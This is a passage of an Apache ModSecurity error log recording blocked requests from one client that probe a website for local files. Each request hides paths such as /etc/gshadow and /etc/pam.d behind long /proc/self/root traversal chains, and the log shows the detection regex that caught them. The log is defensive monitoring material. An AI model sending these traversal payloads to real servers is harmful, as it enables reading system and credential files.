"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6J7ABkC4fWIHEf8H26gAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:19.577993 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:52898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6L6QpVkWug9HeOt89WgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:23.127776 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:37644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6M7ABkC4fWIHEf8H27gAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:40.884509 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:37654] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6RHjZBu2q05ozVU9hBwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:51.952879 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:38902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6T5qj1wV0Si-Okef28QAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:55.567426 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:33680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6U5qj1wV0Si-Okef29gAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:14:22.640490 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.244.31:33214] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg6blajLEzk2WiQ-10aTgAAAoQ"]
[Mon Mar 16 14:14:24.698549 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.243.203:33694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6cKQpVkWug9HeOt89dgAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:28.057521 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.243.203:49594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6dFajLEzk2WiQ-10aWAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:29.392662 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:49608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ddSswJuvopo3lOhnTAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:30.696439 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:55972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6dqTCbgAP5jq5TegzBAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:31.875624 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:55976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6d6TCbgAP5jq5TegzBQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:34.227440 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:55992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6eo6lpbStxTqkSkt0vwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:35.628530 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:56008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6e3jZBu2q05ozVU9hMgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:39.987448 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:56010] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6f9SswJuvopo3lOhnUAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:41.368189 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:41918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6gY6lpbStxTqkSkt0wgAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:42.714616 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:41930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6go6lpbStxTqkSkt0wwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:44.075211 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:41946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6hP9ocpUE4ed4uDz4OQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:45.398156 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:41948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6hdSswJuvopo3lOhnUwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:46.703995 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:41952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6hv9ocpUE4ed4uDz4OgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:47.915106 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.243.203:41966] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6h6QpVkWug9HeOt89ewAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:49.199006 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:41980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6iZqj1wV0Si-Okef3AQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:14:50.415965 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:59090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 